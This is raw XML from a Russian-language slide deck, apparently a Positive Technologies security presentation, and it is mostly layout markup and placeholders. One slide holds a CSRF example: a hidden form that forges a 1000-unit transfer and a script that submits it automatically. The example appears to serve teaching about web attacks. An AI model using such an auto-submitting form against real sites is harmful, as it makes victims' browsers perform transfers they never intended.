              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="1000"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="Transfer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> CSRF"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>document.csrf_form.submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>();&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2831635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9</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="760881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B80FBCB0-19C3-4625-922F-1E99633524D5}"/>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997B471C-22F4-4921-A6C9-323F1774D17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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Заголовок 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB07697D-9A54-4A06-A5D0-96CE9E247AD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338035" y="351064"/>
            <a:ext cx="5464629" cy="5598885"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Образец заголовка</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Рисунок 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B362898B-58E7-4E6A-BD05-B9D65B1DA2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10" name="Текст 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{641F2D1B-F3ED-4432-8AFF-DA00FD0CC79E}"/>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TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76FFB3BD-8AF8-4135-8DA5-C86CF3BD8405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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98730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3B5CA0C3-2E3F-4C16-8F43-1643E3AA67E7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5"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3334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3"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442913" y="1954213"/>
            <a:ext cx="11306175" cy="3995737"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>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1" name="TextBox 10"/>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7" name="TextBox 16"/>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89594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3" name="Заголовок 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681830" y="1071836"/>
            <a:ext cx="9067257"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2681830" y="1954213"/>
            <a:ext cx="4385720" cy="39957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4" name="Объект 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7464425" y="1954212"/>
            <a:ext cx="4284662" cy="3995737"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358383"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7" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356686" y="1954212"/>
            <a:ext cx="2022107" cy="701881"/>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0" name="TextBox 19"/>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49102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2674851" y="2333034"/>
            <a:ext cx="4392699" cy="3616915"/>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7" name="Номер слайда 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3B5CA0C3-2E3F-4C16-8F43-1643E3AA67E7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Рисунок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Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358383" y="3444658"/>
            <a:ext cx="2022107" cy="2510573"/>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333035"/>
            <a:ext cx="2022107" cy="1111624"/>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4"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806882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357009" y="3673065"/>
            <a:ext cx="6710541" cy="2276886"/>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0" name="Рисунок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Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358383" y="2605532"/>
            <a:ext cx="6709167" cy="766997"/>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111390"/>
            <a:ext cx="6710864" cy="494142"/>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0"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395F98E6-4BB7-4BB4-BA79-89A462A71BC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9804400" y="6180985"/>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413174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
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Прямоугольник 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C62A2F5-0D18-448F-8F09-10CE830C3C56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4727575"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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32E44E1D-04E4-45C0-8D07-C18DE0648E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3074" r="35414"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-13407" y="772938"/>
            <a:ext cx="4740982" cy="6085061"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Текст 3"/>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8" name="Заголовок 1"/>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dirty="0"/>
              <a:t>Образец заголовка</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Текст 3"/>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Текст 3"/>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TextBox 19"/>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22" name="Номер слайда 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8554B43C-F7D2-4051-B789-EA94A05E9764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9804400" y="6180985"/>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549499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83A0B7E-0842-41CB-8C3F-61B796FB8B9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0" y="0"/>
            <a:ext cx="4711700" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Текст 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFE0D836-39B7-437E-ADCF-A3F8C393C34E}"/>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6" name="Текст 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB5CA8A7-0417-46A1-B3D1-07DCA0AA8B5C}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACE15152-6544-4481-A539-8ADD4F796A6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Заголовок 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A204C63-43EC-4C40-88C3-75DC103B2776}"/>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dirty="0"/>
              <a:t>Образец заголовка</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Текст 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74C03718-8A69-4A18-8CE1-7E67AAE8BD8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0" name="Текст 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2EB45C5-7255-4807-93FB-965621802D8D}"/>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TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F3092F3-95F7-4406-A888-07CFA181977D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8057605-4F0A-47D5-B37D-1CCA31B132EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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A949AD08-8FE2-48EB-82F1-7D36655F4225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9804400" y="6180985"/>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128327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3">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2082E0A9-6C9E-4AF5-AE5D-5ED702C2975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4711700" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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2" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5931929-390C-40D5-BF41-13E659AA16FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A635510A-4412-44FA-AC10-88979BCC2937}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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5"/>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731216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4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>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5"/>
            <a:ext cx="2044896" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3B5CA0C3-2E3F-4C16-8F43-1643E3AA67E7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Прямоугольник 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88085F97-2606-42E1-94FB-F0F87BB37AFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-20377"/>
            <a:ext cx="4727575" cy="474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
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Рисунок 17" descr="Изображение выглядит как внутренний&#10;&#10;Автоматически созданное описание">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34BDA662-AF19-46A9-9C6D-2C8E44F2909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41533" t="5004" r="32376" b="25768"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="1840374"/>
            <a:ext cx="4727574" cy="5017625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5931929-390C-40D5-BF41-13E659AA16FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333826" y="6197644"/>
            <a:ext cx="1809278" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Positive Technologies</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A635510A-4412-44FA-AC10-88979BCC2937}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681830" y="6191074"/>
            <a:ext cx="1314142" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptsecurity.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Текст 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F0FC162-9D21-46AE-8320-1EA520BECA44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356686" y="323355"/>
            <a:ext cx="9447714" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73101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Изображение и текст">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4720637" cy="6858000"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="ru-RU" dirty="0"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5035419" y="2169763"/>
            <a:ext cx="6713670"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8" name="Заголовок 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5035418" y="1071836"/>
            <a:ext cx="6713669" cy="1097927"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:defRPr sz="4400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Образец заголовка</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>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555792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Обложка 2">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F8B32EFF-221D-4426-BA95-5BF00E9CB09F}"/>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36ED833-42E3-4E9A-A22D-262C9BC0B1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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Рисунок 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F07D4B-2C82-4522-9B32-301D45E251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TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E2244AA-4963-43E1-B431-612A4AB06028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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0" name="Текст 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CC08AFF-ABFF-48DF-B383-02773DDB64F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333647" y="617108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Текст 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{723D8B8E-54E1-4888-8704-23B24CC61795}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338035" y="1291887"/>
            <a:ext cx="5913664" cy="476612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2" name="Заголовок 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45E5AC56-F013-40A4-8C42-94E7A44A3410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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Заголовок</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1623329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0" y="2169763"/>
            <a:ext cx="9067259"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3"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dirty="0"/>
              <a:t>Образец заголовка</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14"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6" name="TextBox 15"/>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66373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0" y="2169763"/>
            <a:ext cx="6727283"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2" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
